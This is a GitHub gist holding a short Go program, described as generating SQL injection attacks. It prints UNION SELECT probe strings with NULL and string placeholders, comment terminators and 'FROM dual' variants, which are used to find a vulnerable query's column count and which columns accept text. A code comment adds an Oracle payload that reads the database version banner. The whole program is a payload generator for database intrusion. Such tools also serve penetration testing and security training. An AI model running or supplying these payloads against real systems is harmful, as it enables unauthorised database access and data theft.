Skip to content

Instantly share code, notes, and snippets.

@soniah

soniah/main.go

Last active April 5, 2023 06:20
Show Gist options
  • Save soniah/648ca55cd4f4286bbfff46275b951e2c to your computer and use it in GitHub Desktop.
Save soniah/648ca55cd4f4286bbfff46275b951e2c to your computer and use it in GitHub Desktop.
Download ZIP
generate sql injection attacks
Raw
main.go
package main
import (
"flag"
"fmt"
"strings"
)
/*
in Oracle, need:
version
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
*/
func main() {
nColSearch := flag.Int("cn", 0, "number of columns of only nulls")
nStringSearch := flag.Int("cs", 0, "number of columns of interleaved strings")
flag.Parse()
// generate lines like:
// ' UNION SELECT NULL,NULL,NULL--
for i := 1; i <= *nColSearch; i++ {
nulls, _ := strings.CutPrefix(strings.Repeat(",NULL", i), ",")
fmt.Printf("' UNION SELECT %s--\n", nulls)
fmt.Printf("' UNION SELECT %s-- \n", nulls)
fmt.Printf("' UNION SELECT %s#\n", nulls)
fmt.Printf("' UNION SELECT %s# \n", nulls)
fmt.Printf("' UNION SELECT %s FROM dual--\n", nulls)
}
// generate lines like:
// ' UNION SELECT 'aa',NULL,NULL,NULL--
// ' UNION SELECT NULL,'aa',NULL,NULL--
if *nStringSearch > 0 {
all := strings.Split("'aa'"+strings.Repeat(",NULL", *nStringSearch-1), ",")
for i := 0; i < *nStringSearch; i++ {
fmt.Printf("' UNION SELECT %s--\n", strings.Join(all, ","))
fmt.Printf("' UNION SELECT %s-- \n", strings.Join(all, ","))
fmt.Printf("' UNION SELECT %s#\n", strings.Join(all, ","))
fmt.Printf("' UNION SELECT %s# \n", strings.Join(all, ","))
fmt.Printf("' UNION SELECT %s FROM dual--\n", strings.Join(all, ","))
rotate(all, 1)
}
}
}
func rotate[T any](ss []T, k int) {
k = k % len(ss)
if k != 0 {
copy(ss, append(ss[len(ss)-k:], ss[:len(ss)-k]...))
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment